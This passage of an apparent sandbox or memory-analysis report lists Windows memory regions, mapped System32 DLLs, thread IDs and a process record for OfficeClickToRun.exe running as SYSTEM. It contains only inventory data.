(normalized: "c:\\windows\\system32\\msvcp110_win.dll") Region: id = 908 start_va = 0x7ffc4f990000 end_va = 0x7ffc4f9c8fff entry_point = 0x7ffc4f990000 region_type = mapped_file name = "policymanager.dll" filename = "\\Windows\\System32\\policymanager.dll" (normalized: "c:\\windows\\system32\\policymanager.dll") Region: id = 909 start_va = 0x7ffc4f9d0000 end_va = 0x7ffc4f9d8fff entry_point = 0x7ffc4f9d0000 region_type = mapped_file name = "httpprxc.dll" filename = "\\Windows\\System32\\httpprxc.dll" (normalized: "c:\\windows\\system32\\httpprxc.dll") Region: id = 910 start_va = 0x7ffc4f9e0000 end_va = 0x7ffc4fa14fff entry_point = 0x7ffc4f9e0000 region_type = mapped_file name = "fwpolicyiomgr.dll" filename = "\\Windows\\System32\\fwpolicyiomgr.dll" (normalized: "c:\\windows\\system32\\fwpolicyiomgr.dll") Region: id = 911 start_va = 0x7ffc4fa20000 end_va = 0x7ffc4faf9fff entry_point = 0x7ffc4fa20000 region_type = mapped_file name = "mpssvc.dll" filename = "\\Windows\\System32\\MPSSVC.dll" (normalized: "c:\\windows\\system32\\mpssvc.dll") Region: id = 912 start_va = 0x7ffc4fb00000 end_va = 0x7ffc4fb35fff entry_point = 0x7ffc4fb00000 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 913 start_va = 0x7ffc4fb40000 end_va = 0x7ffc4fc09fff entry_point = 0x7ffc4fb40000 region_type = mapped_file name = "bfe.dll" filename = "\\Windows\\System32\\BFE.DLL" (normalized: "c:\\windows\\system32\\bfe.dll") Region: id = 914 start_va = 0x7ffc50400000 end_va = 0x7ffc504f1fff entry_point = 0x7ffc50400000 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 915 start_va = 0x7ffc50500000 end_va = 0x7ffc5059afff entry_point = 0x7ffc50500000 region_type = mapped_file name = "msvcp_win.dll" filename = "\\Windows\\System32\\msvcp_win.dll" (normalized: "c:\\windows\\system32\\msvcp_win.dll") Region: id = 916 start_va = 0x7ffc50980000 end_va = 0x7ffc509e7fff entry_point = 0x7ffc50980000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 917 start_va = 0x7ffc50a50000 end_va = 0x7ffc50a69fff entry_point = 0x7ffc50a50000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 918 start_va = 0x7ffc50a70000 end_va = 0x7ffc50a85fff entry_point = 0x7ffc50a70000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 919 start_va = 0x7ffc514b0000 end_va = 0x7ffc514c5fff entry_point = 0x7ffc514b0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 920 start_va = 0x7ffc51760000 end_va = 0x7ffc5181ffff entry_point = 0x7ffc51760000 region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 921 start_va = 0x7ffc519c0000 end_va = 0x7ffc51a24fff entry_point = 0x7ffc519c0000 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 922 start_va = 0x7ffc51c30000 end_va = 0x7ffc51c3afff entry_point = 0x7ffc51c30000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 923 start_va = 0x7ffc51c50000 end_va = 0x7ffc51c87fff entry_point = 0x7ffc51c50000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 924 start_va = 0x7ffc52640000 end_va = 0x7ffc52652fff entry_point = 0x7ffc52640000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 925 start_va = 0x7ffc52730000 end_va = 0x7ffc527f7fff entry_point = 0x7ffc52730000 region_type = mapped_file name = "coremessaging.dll" filename = "\\Windows\\System32\\CoreMessaging.dll" (normalized: "c:\\windows\\system32\\coremessaging.dll") Region: id = 926 start_va = 0x7ffc52ef0000 end_va = 0x7ffc52f16fff entry_point = 0x7ffc52ef0000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 927 start_va = 0x7ffc532b0000 end_va = 0x7ffc532e1fff entry_point = 0x7ffc532b0000 region_type = mapped_file name = "fwbase.dll" filename = "\\Windows\\System32\\fwbase.dll" (normalized: "c:\\windows\\system32\\fwbase.dll") Region: id = 928 start_va = 0x7ffc534a0000 end_va = 0x7ffc534c2fff entry_point = 0x7ffc534a0000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 929 start_va = 0x7ffc53640000 end_va = 0x7ffc53687fff entry_point = 0x7ffc53640000 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 930 start_va = 0x7ffc53830000 end_va = 0x7ffc5383bfff entry_point = 0x7ffc53830000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 931 start_va = 0x7ffc53920000 end_va = 0x7ffc53951fff entry_point = 0x7ffc53920000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 932 start_va = 0x7ffc53a90000 end_va = 0x7ffc53ac2fff entry_point = 0x7ffc53a90000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 933 start_va = 0x7ffc53be0000 end_va = 0x7ffc53c87fff entry_point = 0x7ffc53be0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 934 start_va = 0x7ffc53dd0000 end_va = 0x7ffc53e2cfff entry_point = 0x7ffc53dd0000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 935 start_va = 0x7ffc54210000 end_va = 0x7ffc54226fff entry_point = 0x7ffc54210000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 936 start_va = 0x7ffc54280000 end_va = 0x7ffc5428afff entry_point = 0x7ffc54280000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 937 start_va = 0x7ffc54320000 end_va = 0x7ffc5434bfff entry_point = 0x7ffc54320000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 938 start_va = 0x7ffc543a0000 end_va = 0x7ffc543c7fff entry_point = 0x7ffc543a0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 939 start_va = 0x7ffc543d0000 end_va = 0x7ffc5443afff entry_point = 0x7ffc543d0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 940 start_va = 0x7ffc545a0000 end_va = 0x7ffc545e9fff entry_point = 0x7ffc545a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 941 start_va = 0x7ffc54610000 end_va = 0x7ffc5461efff entry_point = 0x7ffc54610000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 942 start_va = 0x7ffc54620000 end_va = 0x7ffc54663fff entry_point = 0x7ffc54620000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 943 start_va = 0x7ffc54f80000 end_va = 0x7ffc55032fff entry_point = 0x7ffc54f80000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 944 start_va = 0x7ffc55040000 end_va = 0x7ffc5521cfff entry_point = 0x7ffc55040000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 945 start_va = 0x7ffc552c0000 end_va = 0x7ffc5535cfff entry_point = 0x7ffc552c0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 946 start_va = 0x7ffc554e0000 end_va = 0x7ffc5562dfff entry_point = 0x7ffc554e0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 947 start_va = 0x7ffc55800000 end_va = 0x7ffc558acfff entry_point = 0x7ffc55800000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 948 start_va = 0x7ffc55910000 end_va = 0x7ffc559cdfff entry_point = 0x7ffc55910000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 949 start_va = 0x7ffc56f00000 end_va = 0x7ffc56f07fff entry_point = 0x7ffc56f00000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 950 start_va = 0x7ffc56f10000 end_va = 0x7ffc57094fff entry_point = 0x7ffc56f10000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 951 start_va = 0x7ffc570a0000 end_va = 0x7ffc571c5fff entry_point = 0x7ffc570a0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 952 start_va = 0x7ffc571d0000 end_va = 0x7ffc5744bfff entry_point = 0x7ffc571d0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 953 start_va = 0x7ffc57540000 end_va = 0x7ffc5759afff entry_point = 0x7ffc57540000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 954 start_va = 0x7ffc57750000 end_va = 0x7ffc57890fff entry_point = 0x7ffc57750000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 955 start_va = 0x7ffc57900000 end_va = 0x7ffc57968fff entry_point = 0x7ffc57900000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 956 start_va = 0x7ffc57970000 end_va = 0x7ffc57a14fff entry_point = 0x7ffc57970000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 957 start_va = 0x7ffc57aa0000 end_va = 0x7ffc57b45fff entry_point = 0x7ffc57aa0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 958 start_va = 0x7ffc57b50000 end_va = 0x7ffc57d11fff entry_point = 0x7ffc57b50000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Thread: id = 366 os_tid = 0x6f0 Thread: id = 367 os_tid = 0x698 Thread: id = 368 os_tid = 0x694 Thread: id = 369 os_tid = 0x644 Thread: id = 370 os_tid = 0x638 Thread: id = 371 os_tid = 0x610 Thread: id = 372 os_tid = 0x5fc Thread: id = 373 os_tid = 0x58c Thread: id = 374 os_tid = 0x588 Thread: id = 375 os_tid = 0x500 Thread: id = 376 os_tid = 0x4fc Thread: id = 377 os_tid = 0x4ec Thread: id = 378 os_tid = 0x4d4 Thread: id = 379 os_tid = 0x4cc Thread: id = 380 os_tid = 0x4bc Thread: id = 381 os_tid = 0x4ac Thread: id = 382 os_tid = 0x4a8 Thread: id = 383 os_tid = 0x4a0 Thread: id = 384 os_tid = 0x49c Thread: id = 385 os_tid = 0x494 Thread: id = 386 os_tid = 0x48c Thread: id = 387 os_tid = 0x488 Thread: id = 388 os_tid = 0x484 Thread: id = 389 os_tid = 0x480 Thread: id = 390 os_tid = 0x474 Thread: id = 391 os_tid = 0x448 Thread: id = 471 os_tid = 0xe3c Process: id = "16" image_name = "officeclicktorun.exe" filename = "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeclicktorun.exe" page_root = "0x6dde5000" os_pid = "0x4c4" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0x1e4" cmd_line = "\"C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeClickToRun.exe\" /service" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Region: id = 2548 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2549 start_va = 0xdea8130000 end_va = 0xdea813ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000dea8130000" filename = "" Region: id = 2550 start_va = 0xdea8140000 end_va = 0xdea8146fff entry_point = 0x0 region_type = private name = "private_0x000000dea8140000" filename = "" Region: id = 2551 start_va = 0xdea8150000 end_va = 0xdea8163fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000dea8150000" filename = "" Region: id = 2552 start_va = 0xdea8170000 end_va = 0xdea826ffff entry_point = 0x0 region_type = private name = "private_0x000000dea8170000" filename = "" Region: id = 2553 start_va = 0xdea8270000 end_va = 0xdea8273fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000dea8270000" filename = "" Region: id = 2554 start_va = 0xdea8280000 end_va = 0xdea8282fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000dea8280000" filename = "" Region: id = 2555 start_va = 0xdea8290000 end_va = 0xdea8291fff entry_point = 0x0 region_type = private name = "private_0x000000dea8290000" filename = "" Region: id = 2556 start_va = 0xdea82a0000 end_va = 0xdea835dfff entry_point = 0xdea82a0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2557 start_va = 0xdea8360000 end_va = 0xdea8366fff entry_point = 0x0 region_type = private name = "private_0x000000dea8360000" filename = "" Region: id = 2558 start_va = 0xdea8370000 end_va = 0xdea8370fff entry_point = 0x0 region_type = private name = "private_0x000000dea8370000" filename = "" Region: id = 2559 start_va = 0xdea8380000 end_va = 0xdea8380fff entry_point = 0x0 region_type = private name = "private_0x000000dea8380000" filename = "" Region: id = 2560 start_va = 0xdea8390000 end_va = 0xdea8390fff entry_point = 0x0 region_type = private name = "private_0x000000dea8390000" filename = "" Region: id = 2561 start_va = 0xdea83a0000 end_va = 0xdea849ffff entry_point = 0x0 region_type = private name = "private_0x000000dea83a0000" filename = "" Region: id = 2562 start_va = 0xdea84a0000 end_va = 0xdea84a2fff entry_point = 0xdea84a0000 region_type = mapped_file name = "mswsock.dll.mui" filename = "\\Windows\\System32\\en-US\\mswsock.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mswsock.dll.mui") Region: id = 2563 start_va = 0xdea84c0000 end_va = 0xdea84c9fff entry_point = 0xdea84c0000 region_type = mapped_file name = "crypt32.dll.mui" filename = "\\Windows\\System32\\en-US\\crypt32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\crypt32.dll.mui") Region: id = 2564 start_va = 0xdea84d0000 end_va = 0xdea85cffff entry_point = 0x0 region_type = private name = "private_0x000000dea84d0000" filename = "" Region: id = 2565 start_va = 0xdea86a0000 end_va = 0xdea875ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000dea86a0000" filename = "" Region: id = 2566 start_va = 0xdea8760000 end_va = 0xdea8760fff entry_point = 0x0 region_type = private name = "private_0x000000dea8760000" filename = "" Region: id = 2567 start_va = 0xdea8770000 end_va = 0xdea8771fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000dea8770000" filename = "" Region: id = 2568 start_va = 0xdea8780000 end_va = 0xdea8780fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000dea8780000" filename = "" Region: id = 2569 start_va = 0xdea8790000 end_va = 0xdea8791fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000dea8790000" filename = "" Region: id = 2570 start_va = 0xdea87a0000 end_va = 0xdea87a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000dea87a0000" filename = "" Region: id = 2571 start_va = 0xdea87b0000 end_va = 0xdea87bffff entry_point = 0x0 region_type = private name = "private_0x000000dea87b0000" filename = "" Region: id = 2572 start_va = 0xdea87c0000 end_va = 0xdea8947fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000dea87c0000" filename = "" Region: id = 2573 start_va = 0xdea8950000 end_va = 0xdea8ad0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000dea8950000" filename = "" Region: id = 2574 start_va = 0xdea8ae0000 end_va = 0xdea8bdffff entry_point = 0x0 region_type = private name = "private_0x000000dea8ae0000" filename = "" Region: id = 2575 start_va = 0xdea8be0000 end_va = 0xdea8f16fff entry_point = 0xdea8be0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2576 start_va = 0xdea8f20000 end_va = 0xdea901ffff entry_point = 0x0 region_type = private name = "private_0x000000dea8f20000" filename = "" Region: id = 2577 start_va = 0xdea9020000 end_va = 0xdea921ffff entry_point = 0x0 region_type = private name = "private_0x000000dea9020000" filename = "" Region: id = 2578 start_va = 0xdea9220000 end_va = 0xdea931ffff entry_point = 0x0 region_type = private name = "private_0x000000dea9220000" filename = "" Region: id = 2579 start_va = 0xdea9320000 end_va = 0xdea941ffff entry_point = 0x0 region_type = private name = "private_0x000000dea9320000" filename = "" Region: id = 2580 start_va = 0xdea9420000 end_va = 0xdea951ffff entry_point = 0x0 region_type = private name = "private_0x000000dea9420000" filename = "" Region: id = 2581 start_va = 0xdea9520000 end_va = 0xdea961ffff entry_point = 0x0 region_type = private name = "private_0x000000dea9520000" filename = "" Region: id = 2582 start_va = 0xdea9620000 end_va = 0xdea9620fff entry_point = 0xdea9620000 region_type = mapped_file name = "counters.dat" filename = "\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\windows\\system32\\config\\systemprofile\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat") Region: id = 2583 start_va = 0xdea9630000 end_va = 0xdea972ffff entry_point = 0x0 region_type = private name = "private_0x000000dea9630000" filename = "" Region: id = 2584 start_va = 0xdea9730000 end_va = 0xdea982ffff entry_point = 0x0 region_type = private name = "private_0x000000dea9730000" filename = "" Region: id = 2585 start_va = 0xdea9830000 end_va = 0xdea992ffff entry_point = 0x0 region_type = private name = "private_0x000000dea9830000" filename = "" Region: id = 2586 start_va = 0xdea9930000 end_va = 0xdea9a3bfff entry_point = 0x0 region_type = private name = "private_0x000000dea9930000" filename = "" Region: id = 2587 start_va = 0xdea9a40000 end_va = 0xdea9c50fff entry_point = 0x0 region_type = private name = "private_0x000000dea9a40000" filename = "" Region: id = 2588 start_va = 0xdea9c60000 end_va = 0xdea9d5ffff entry_point = 0x0 region_type = private name = "private_0x000000dea9c60000" filename = "" Region: id = 2589 start_va = 0xdea9d60000 end_va = 0xdea9d60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000dea9d60000" filename = "" Region: id = 2590 start_va = 0xdea9d70000 end_va = 0xdea9d70fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000dea9d70000" filename = "" Region: id = 2591 start_va = 0xdea9d80000 end_va = 0xdea9d80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000dea9d80000" filename = "" Region: id = 2592 start_va = 0xdea9d90000 end_va = 0xdea9d90fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000dea9d90000" filename = "" Region: id = 2593 start_va = 0xdea9da0000 end_va = 0xdea9e9ffff entry_point = 0x0 region_type = private name = "private_0x000000dea9da0000" filename = "" Region: id = 2594 start_va = 0xdea9ea0000 end_va = 0xdea9ea0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000dea9ea0000" filename = "" Region: id = 2595 start_va = 0xdea9eb0000 end_va = 0xdea9eb0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000dea9eb0000" filename = "" Region: id = 2596 start_va = 0xdea9ec0000 end_va = 0xdea9ec0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000dea9ec0000" filename = "" Region: id = 2597 start_va = 0xdea9ed0000 end_va = 0xdea9ed0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000dea9ed0000" filename = "" Region: id = 2598 start_va = 0xdea9ee0000 end_va = 0xdea9ee0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000dea9ee0000" filename = "" Region: id = 2599 start_va = 0xdea9ef0000 end_va = 0xdea9ef0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000dea9ef0000" filename = "" Region: id = 2600 start_va = 0xdea9f00000 end_va = 0xdeaa2fffff entry_point = 0x0 region_type = private name = "private_0x000000dea9f00000" filename = "" Region: id = 2601 start_va = 0xdeaa400000 end_va = 0xdeaa4fffff entry_point = 0x0 region_type = private name = "private_0x000000deaa400000" filename = "" Region: id = 2602 start_va = 0xdeaa600000 end_va = 0xdeaa6fffff entry_point = 0x0 region_type = private name = "private_0x000000deaa600000" filename = "" Region: id = 2603 start_va = 0xdeaa700000 end_va = 0xdeaa7fffff entry_point = 0x0 region_type = private name = "private_0x000000deaa700000" filename = "" Region: id = 2604 start_va = 0xdeaa800000 end_va = 0xdeaa8fffff entry_point = 0x0 region_type = private name = "private_0x000000deaa800000" filename = "" Region: id = 2605 start_va = 0xdeaa900000 end_va = 0xdeaa9fffff entry_point = 0x0 region_type = private name = "private_0x000000deaa900000" filename = "" Region: id = 2606 start_va = 0xdeaaa00000 end_va = 0xdeaaa04fff entry_point = 0xdeaaa00000 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll") Region: id = 2607 start_va = 0xdeaaa10000 end_va = 0xdeaaa1ffff entry_point = 0xdeaaa10000 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui") Region: id = 2608 start_va = 0xdeaaa20000 end_va = 0xdeaaa20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000deaaa20000" filename = "" Region: id = 2609 start_va = 0xdeaaa30000 end_va = 0xdeaaa30fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000deaaa30000" filename = "" Region: id = 2610 start_va = 0xdeaaa40000 end_va = 0xdeaab3ffff entry_point = 0x0 region_type = private name = "private_0x000000deaaa40000" filename = "" Region: id = 2611 start_va = 0xdeaac40000 end_va = 0xdeaad3ffff entry_point = 0x0 region_type = private name = "private_0x000000deaac40000" filename = "" Region: id = 2612 start_va = 0x7df5ff520000 end_va = 0x7ff5ff51ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff520000" filename = "" Region: id = 2613 start_va = 0x7ff6ca962000 end_va = 0x7ff6ca963fff entry_point = 0x0 region_type = private name = "private_0x00007ff6ca962000" filename = "" Region: id = 2614 start_va = 0x7ff6ca964000 end_va = 0x7ff6ca965fff entry_point = 0x0 region_type = private name = "private_0x00007ff6ca964000" filename = "" Region: id = 2615 start_va = 0x7ff6ca966000 end_va = 0x7ff6ca967fff entry_point = 0x0 region_type = private name = "private_0x00007ff6ca966000" filename = "" Region: id = 2616 start_va = 0x7ff6ca968000 end_va = 0x7ff6ca969fff entry_point = 0x0 region_type = private name = "private_0x00007ff6ca968000" filename = "" Region: id = 2617 start_va = 0x7ff6ca96a000 end_va = 0x7ff6ca96bfff entry_point = 0x0 region_type = private name = "private_0x00007ff6ca96a000" filename = "" Region: id = 2618 start_va = 0x7ff6ca96e000 end_va = 0x7ff6ca96ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6ca96e000" filename = "" Region: id = 2619 start_va = 0x7ff6ca972000 end_va = 0x7ff6ca973fff entry_point = 0x0 region_type = private name = "private_0x00007ff6ca972000" filename = "" Region: id = 2620 start_va = 0x7ff6ca974000 end_va = 0x7ff6ca975fff entry_point = 0x0 region_type = private name = "private_0x00007ff6ca974000" filename = "" Region: id = 2621 start_va = 0x7ff6ca976000 end_va = 0x7ff6ca977fff entry_point = 0x0 region_type = private name = "private_0x00007ff6ca976000" filename = "" Region: id = 2622 start_va = 0x7ff6ca978000 end_va = 0x7ff6ca979fff entry_point = 0x0 region_type = private name = "private_0x00007ff6ca978000" filename = "" Region: id = 2623 start_va = 0x7ff6ca97a000 end_va = 0x7ff6ca97bfff entry_point = 0x0 region_type = private name = "private_0x00007ff6ca97a000" filename = "" Region: id = 2624 start_va = 0x7ff6ca97c000 end_va = 0x7ff6ca97dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6ca97c000" filename = "" Region: id = 2625 start_va = 0x7ff6ca97e000 end_va = 0x7ff6ca97ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6ca97e000" filename = "" Region: id = 2626 start_va = 0x7ff6ca980000 end_va = 0x7ff6caa7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6ca980000" filename = "" Region: id = 2627 start_va = 0x7ff6caa80000 end_va = 0x7ff6caaa2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6caa80000" filename = "" Region: id = 2628 start_va = 0x7ff6caaa4000 end_va = 0x7ff6caaa4fff entry_point = 0x0 region_type = private name = "private_0x00007ff6caaa4000" filename = "" Region: id = 2629 start_va = 0x7ff6caaa6000 end_va = 0x7ff6caaa7fff entry_point = 0x0 region_type = private name = "private_0x00007ff6caaa6000" filename = "" Region: id = 2630 start_va = 0x7ff6caaa8000 end_va = 0x7ff6caaa9fff entry_point = 0x0 region_type = private name = "private_0x00007ff6caaa8000" filename = "" Region: id = 2631 start_va = 0x7ff6caaac000 end_va = 0x7ff6caaadfff entry_point = 0x0 region_type = private name = "private_0x00007ff6caaac000" filename = "" Region: id = 2632 start_va = 0x7ff6caaae000 end_va = 0x7ff6caaaffff entry_point = 0x0 region_type = private name = "private_0x00007ff6caaae000" filename = "" Region: id = 2633 start_va = 0x7ff6cba50000 end_va = 0x7ff6cc37dfff entry_point = 0x7ff6cba50000 region_type = mapped_file name = "officeclicktorun.exe" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeclicktorun.exe") Region: id = 2634 start_va = 0x7ffc42390000 end_va = 0x7ffc423a3fff entry_point = 0x7ffc42390000 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\System32\\mskeyprotect.dll" (normalized: "c:\\windows\\system32\\mskeyprotect.dll") Region: id = 2635 start_va = 0x7ffc42440000 end_va = 0x7ffc4245efff entry_point = 0x7ffc42440000 region_type = mapped_file name = "ncryptsslp.dll" filename = "\\Windows\\System32\\ncryptsslp.dll" (normalized: "c:\\windows\\system32\\ncryptsslp.dll") Region: id = 2636 start_va = 0x7ffc499d0000 end_va = 0x7ffc49a1cfff entry_point = 0x7ffc499d0000 region_type = mapped_file name = "appvfilesystemmetadata.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVFileSystemMetadata.dll" (normalized: "c:\\program files\\common 